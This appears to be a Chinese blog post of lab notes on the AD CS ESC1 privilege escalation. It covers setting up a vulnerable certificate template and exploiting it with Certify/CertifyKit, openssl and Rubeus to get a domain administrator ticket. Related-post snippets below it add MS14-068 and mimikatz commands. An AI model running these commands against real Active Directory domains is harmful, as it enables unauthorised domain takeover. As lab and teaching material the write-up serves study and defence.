域渗透笔记-ADCS 域提权-ESC1

最新推荐文章于 2024-03-31 10:11:28 发布
最新推荐文章于 2024-03-31 10:11:28 发布
阅读量1.5k 收藏 3
点赞数 1
分类专栏: 域渗透 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45746286/article/details/128847512
版权

简介:

AD CS(Active Directory 证书服务)中的企业CA使用证书模板定义设置颁发证书,这些证书模板是注册策略和预定义证书设置的集合,并包含诸如此证书的有效期是多长?、证书的用途是什么?、主题是如何指定的?、谁可以申请证书?,以及无数其他设置。证书模板有一组特定的设置,这使得它们非常容易受到攻击。

ESC1原理:

当证书模板允许指定subjectAltName时,就可以为另一个用户请求证书。如果EKU指定客户端身份验证或ANY,则可以将其用于特权升级。

ESC1利用条件:

ESC1要成功利用要满足三个点
1、需要有权限去获取证书
2、能够登记为客户端身份验证或智能卡登录等
3、CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT开启

ESC1漏洞环境配置:

首先进入证书颁发机构

选中证书模板,右键管理

接着创建一个具有以上3个利用条件的证书模板
选中工作站身份验证

右键复制模板
模板命名为ESC1

扩展中的应用程序策略中加入客户端身份认证

接着在安全中加入注册权限
这里可以直接给Authenticated Users组或者domain users组赋予注册权限

使用者名称中选择在请求中提供

保存后,我们在证书颁发机构证书模板上右键颁发

这样,我们得ESC1漏洞环境就搭建完成了

ESC1漏洞复现:

这里用来检查证书配置需要用到一款工具Certify
https://github.com/GhostPack/Certify
编译完成后一般是一个exe和一个dll

把他传到域内机器上
执行命令

Certify.exe find /vulnerable

C:\Users\zhangsan\Desktop>Certify.exe find /vulnerable

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=test,DC=com'

[*] Listing info about the Enterprise CA 'test-CA-CA'

    Enterprise CA Name            : test-CA-CA
    DNS Hostname                  : CA.test.com
    FullName                      : CA.test.com\test-CA-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_AD
VANCED
    Cert SubjectName              : CN=test-CA-CA, DC=test, DC=com
    Cert Thumbprint               : D4794268C1A11EB6877159494DBEDA10B660F003
    Cert Serial                   : 23DF32EB2D08A38247F914CC783027BF
    Cert Start Date               : 2023/2/1 10:03:05
    Cert End Date                 : 2028/2/1 10:13:04
    Cert Chain                    : CN=test-CA-CA,DC=test,DC=com
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticat
ed UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators
      S-1-5-32-544
      Allow  ManageCA, ManageCertificates               TEST\Domain Admins
      S-1-5-21-295968744-3078858767-2203154064-512
      Allow  ManageCA, ManageCertificates               TEST\Enterprise Admins
      S-1-5-21-295968744-3078858767-2203154064-519
    Enrollment Agent Restrictions : None

[!] Vulnerable Certificates Templates :

    CA Name                               : CA.test.com\test-CA-CA
    Template Name                         : ESC1
    Schema Version                        : 2
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : NONE
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : 客户端身份验证
    mspki-certificate-application-policy  : 客户端身份验证
    Permissions
      Enrollment Permissions
        Enrollment Rights           : NT AUTHORITY\Authenticated UsersS-1-5-11
                                      TEST\Domain Admins            S-1-5-21-295
968744-3078858767-2203154064-512
                                      TEST\Domain Computers         S-1-5-21-295
968744-3078858767-2203154064-515
                                      TEST\Enterprise Admins        S-1-5-21-295
968744-3078858767-2203154064-519
      Object Control Permissions
        Owner                       : TEST\Administrator            S-1-5-21-295
968744-3078858767-2203154064-500
        WriteOwner Principals       : TEST\Administrator            S-1-5-21-295
968744-3078858767-2203154064-500
                                      TEST\Domain Admins            S-1-5-21-295
968744-3078858767-2203154064-512
                                      TEST\Enterprise Admins        S-1-5-21-295
968744-3078858767-2203154064-519
        WriteDacl Principals        : TEST\Administrator            S-1-5-21-295
968744-3078858767-2203154064-500
                                      TEST\Domain Admins            S-1-5-21-295
968744-3078858767-2203154064-512
                                      TEST\Enterprise Admins        S-1-5-21-295
968744-3078858767-2203154064-519
        WriteProperty Principals    : TEST\Administrator            S-1-5-21-295
968744-3078858767-2203154064-500
                                      TEST\Domain Admins            S-1-5-21-295
968744-3078858767-2203154064-512
                                      TEST\Enterprise Admins        S-1-5-21-295
968744-3078858767-2203154064-519



Certify completed in 00:00:00.6992794

主要看这儿

三点全部满足,开始尝试利用
给域管administrator申请一个证书

Certify.exe request /ca:CA.test.com\test-CA-CA /template:ESC1 /altname:administrator

但是编译出来的exe有点问题

重新找了个项目
https://github.com/Hagrid29/CertifyKit
原本以为是编译的有问题,最后发现是2012虚拟机系统有问题–
最后换了一台2016机器成功了

CertifyKit.exe request /ca:CA.test.com\test-CA-CA /template:ESC1 /altname:administrator

接着把pem格式的证书复制保存txt中,改名cert.pem
然后复制进kali中
接着转换格式

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

接着把pfx格式的证书重新拉进攻击机上,同时使用Rubeus工具获取tgt
https://github.com/GhostPack/Rubeus

在获取tgt之前,我们尝试访问域控上的文件,发现无法访问

使用Rubeus获取tgt(接下来重新搭建了一个相同的域环境重新做的–之前搭建的域环境系统镜像有问题)

Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /dc:192.168.52.131 /ptt

这里遇到了一个报错
KRB-ERROR (62) : KDC_ERR_CLIENT_NOT_TRUSTED

解决方法:
本地管理员权限,打开组策略gpedit.msc,计算机配置\Windows 设置\安全设置\本地策略\安全选项,找到配置 Kerberos 允许的加密类型,将下面全部勾选即可

然后我重启完了还是不行–
然后等了一会又自己好了–就很无语
然后查询了下报错

最快的解决方法:

看了下别人的回答,应该是独立的证书服务器颁发的证书没受到域控制器信任

但是我这莫名其妙就好了。。。到底啥情况我也说不清–
反正是成功获取到了tgt

这时候已经可以访问域控的文件了

NooEmotion
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Synchronizing-Multiple-ADCs-Using-JESD204B_cn.pdf
08-13
"Synchronizing-Multiple-ADCs-Using-JESD204B_cn.pdf" 本文档主要介绍了如何使用JESD204B高速串行接口同步多个ADC器件的方法。该方法可以应用于许多通信、仪器仪表和信号采集系统中,满足低电压数字信号(LVDS)和...
Demystifying Sigma-Delta ADCs
04-19
This in-depth article covers the theory behind a Delta-Sigma analog-to-digital converter (ADC). It specifically focuses on the difficult to understand key digital concepts of over-sampling, noise ...
终于有人把渗透ADCS证书攻击讲透了
weixin_65550121的博客
12-09 1525
PKI是一个术语,有些地方会采用中文的表述——公钥基本结构,用来实现证书的产生、管理、存储、分发和撤销等功能。我们可以把他理解成是一套解决方案,这套解决方案里面需要有证书颁发机构,有证书发布,证书撤掉等功能。
AD CS攻击面剖析
2201_75571291的博客
08-24 360
LEE CHRISTENSEN和WILL SCHROEDER于今年9月30日在Black Hat会议上进行了主题为“CERTIFIED PRE-OWNED:SERVICES”的演讲,首次在公开国际会议中讨论了有关活动目录证书服务(Active Directory Certificate Services,ADCS)的攻击面。AD CS是微软免费的证书管理服务,用于微软的 PKI 实施。企业可以使用ADCS通过将个人、设备或服务的身份绑定到相应的私钥来增强安全性。
渗透笔记-ADCS 提权-ESC4
NoooEmotion的博客
02-06 888
AD CS(Active Directory 证书服务)中的企业CA使用证书模板定义设置颁发证书,这些证书模板是注册策略和预定义证书设置的集合,并包含诸如此证书的有效期是多长?、证书的用途是什么?、主题是如何指定的?、谁可以申请证书?,以及无数其他设置。证书模板有一组特定的设置,这使得它们非常容易受到攻击。
权限提升-Win系统权限提升篇&AD内网控&NetLogon&ADCS&PAC&KDC&CVE漏洞
siu~
03-28 1167
1、WIN-内用户到AD控-CVE-2014-6324 2、WIN-内用户到AD控-CVE-2020-1472 3、WIN-内用户到AD控-CVE-2021-42287 4、WIN-内用户到AD控-CVE-2022-26923 章节点: 1、Web权限提升及转移 2、系统权限提升及转移 3、宿主权限提升及转移 4、控权限提升及转移
【Windows Server 2019】Active Directory Certificate Services 证书颁发机构的安装,配置和管理Ⅰ——AD CS的安装和配置
VMware, Windows, Linux, Cisco, Container, Kubernetes, Kali
07-25 2744
博文主要介绍了Windows Server 2019的证书颁发机构的安装和配置方法。
AD CS证书服务中继攻击
网络安全。
03-05 3861
0x1 简介 AD CS支持几种基于HTTP协议的通过管理员可以安装的其他AD CS服务器角色功能,这些基于HTTP的证书注册接口都是易受攻击的NTLM中继攻击。 注:借图 0x2 环境信息 控(windows server 2016):192.168.3.129 辅控(windows server 2016):192.168.3.131(AD CS) 内主机(windows 10):192.168.3.171 攻击机(kali):192.168.3.158 搭建ADCS证书服务:https://mp.
如何清空matlab的代码-adcs:CubeSat的姿态确定
05-21
如何清空matlab的代码姿态确定卡尔曼滤波器 该模块包含卡尔曼滤波器的实现以及2D和3D中实体旋转动力学的仿真。 本模块的目的 编写该模块是为了了解用于姿态估计的卡尔曼滤波器的工作原理。 单元测试 ...
practical-filter-design-precision-ADCs_cn.pdf
05-31
精密ADC使用的滤波器,很多比如sinc,sigma-delta技术,这些对于高精度ADC的实现,滤波器设计都是非常必要的
MS14-068AD提权神器
05-24
本地WINDOWS: 1.python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.local user-a-1@dom-a.loc位用户 S-1-5-21-557603841-771695929-1514560438-1103 为账号SID dc-a-2003.dom-a.local这机全名 可以通过:1)wmic useraccount where name=”USERNAME” get sid 2)whoami /all 本机可以直接查出自己的SID; 用法国神器破解,需要时最新版本的才支持, 2.mimikatz.exe log "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit TGT_user-a-1@dom-a.loc.ccache指的是第一步所生成的ccache文件。 3. kerberos::ptc TGT_secpulse@secpulse.local.ccache 4.查看: klist net use \\DC2.secpulse.local\admin$ //注:使用IP可能会失败 dir \\DC2.secpulse.local\c$ 看看有木有权限 好运~
matlab均方误差的代码-1-Bit-ADCs:具有1位ADC的大规模MIMO深度学习
05-23
matlab均方误差的代码具有1位ADC的大规模MIMO深度学习:当更多天线需要更少的飞行员时 这是与以下文章相关的MATLAB代码:Yu Zhang,Muhammad Alrabeiah和Ahmed Alkhateeb,“,” arXiv电子版,第47页。 arXiv:1910...
环境提权
qq_44657899的博客
11-09 3686
文章目录NetLogon特权提权漏洞(CVE-2020-1472)复现 NetLogon特权提权漏洞(CVE-2020-1472)复现 简介 CVE-2020-1472是一个windows控中严重的远程权限提升漏洞,攻击者通过NetLogon,建立与控间易受攻击的安全通道时,可利用此漏洞获取管访问权限。 影响版本 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-
内网渗透:七、windows组策略首选项提权
liu_jia_liang的博客
03-01 2598
一、sysvol目录 SYSVOL是所有经过身份验证的用户具有读访问权限的Active Directory中的范围共享。SYSVOL是指存储公共文件服务器副本的共享文件夹,它们在中所有的控制器之间复制。 Sysvol文件夹是安装AD时创建的,它用来存放GPO、Script等信息。同时,存放在Sysvol文件夹中的信息,会复制到中所有DC上。SYSVOL包含登录脚本,组策略数据以及需要在任何有控制器的任何地方可用的其他范围数据(因为SYSVOL在所有控制器之间自动同步并共享)。所有...
内网渗透环境探索和简单提权
最新发布
m0_70349048的博客
03-31 358
因为控可以登录内所有管辖的主机,因此登录过程中的密码会被记录下来,即winlog进程把密码拿到,发给后面的lasss,然后还会进行hash加密保存到SAM中。假如我么已经拿下了一个普通主机,想要登录权限更大的控,我们的目的就是获取控的密码,明文更好,hash后的也能用。内主机就作为普通的机器,只有普通的权限,一般我们拿下跳板机之后,就会拿下普通的主机,然后想办法提权或者进入控。控服务器是管理环境的,相当于“领导”,可以划分,提供服务,并且可以登录内的任何一台机器。
渗透(三)-渗透技术
黑白的博客
05-03 4343
相关的一般会加/domain,不加的就是本地的信息cmd的IP扫描。
Windows Server2008 R2搭建AD(Active Directory)控制器
旷野亮光
11-14 5008
目录 前言 1、配置环境 2、实验环境 3、安装活动目录,搭建环境 4、安装后的操作 5、将计算机加入 前言 在计算机系统中有两种计算机组织方式,分别是工作组和的方式;局网上的资源需要管理,“”和“工作组”就是两种不同的网络资源管理模式。那么二者有何区别呢? 工作组(Work Group): 工作组实行的是分散的管理模式,每一台计算机都是独立的个体。用户账户和权限信息...
用户提权
wuxinweii的博客
11-21 3536
MS14-068漏洞利用 什么是MS14-068漏洞? 在kerberos 协议中,Client去访问Server,需要知道是否具有访问权限。所以微软在KRB_AS_REP中的TGT中增加了Client的PAC(特权属性证书),也就是Client的权限,包括Client的User的SID、Group的SID。 ms14-068 漏洞就是在经过身份验证的Client在TGT中伪造高权限的PAC。 该漏洞允许任何一个普通用户,将自己提升至管理员权限。微软给出的补丁号kb3011780。 MS14-068是非
CVE-2020-1472(提权)
p01son的博客
08-02 657
CVE-2020-1472(提权) Created: July 7, 2021 5:25 PM 文章目录CVE-2020-1472(提权)简介影响范围复现环境复现过程恢复原机器hash参考 简介 CVE-2020-1472是一个windows控中严重的远程权限提升漏洞,是因为微软在Netlogon协议中没有正确使用加密算法而导致的漏洞。由于微软在进行AES加密运算过程中,使用了AES-CFB8模式并且错误的将IV设置为全零,这使得攻击者在明文(client chanllenge)、IV等要素可控的
用keil生成瑞萨EK-RA2A1单片机的adc初始化程序
04-24
好的,以下是KEIL生成瑞萨EK-RA2A1单片机的ADC初始化程序的步骤: 1. 打开KEIL软件,依次选择Project -> New MicroVision Project,输入项目名称; 2. 在弹出的对话框中选择设备型号为“R5F10PBG”(瑞萨EK-RA2A1单片机),确认选择; 3. 在Project菜单中选择Options for Target,选择Device,确保芯片型号正确; 4. 在Project菜单中选择Manage,选择Device Database,找到R5F10PBG芯片,双击打开,选择ADC模块,重新定义ADC资源; 5. 在Project菜单中选择C/C++ Source Group,右键选择Add New Item,选择C File,添加一个名为“adc.c”的文件; 6. 在adc.c中加入初始化代码,例如: ``` #include "ra2a1.h" void adc_init(void) { volatile uint32_t i; // Enable ADC clock SYSTEM.PRCR.WORD = 0xA50B; MSTP(ADC) = 0; // ADC module stop state release // Set ADCS (sampling time) and CHSEL (input channel) ADC.ADCSR.BIT.ADCS = 0b1111; // Sampling time = 239.5 cycles ADC.ADCSR.BIT.CHSEL = 0; // Select AN000 // Start self-diagnosis ADC.ADCSR.BIT.ADST = 1; while (ADC.ADCSR.BIT.ADST) { // Wait until self-diagnosis is completed } // Initialize the AD converter ADC.ADCSR.WORD = 0x2C40; for (i = 0; i < 16; i++) { ADC.ADCSR.WORD |= 0x8000; // Wait 8us settling time } ADC.ADCSR.WORD |= 0x2000; // Start A/D conversion // Wait for A/D conversion to end while (!(ADC.ADCSR.WORD & 0x0008)) { // Wait until A/D conversion is completed } // Clear the A/D conversion complete flag ADC.ADCSR.WORD &= ~0x0008; } ``` 7. 在main函数中调用adc_init()函数即可。 希望这个答案对你有所帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值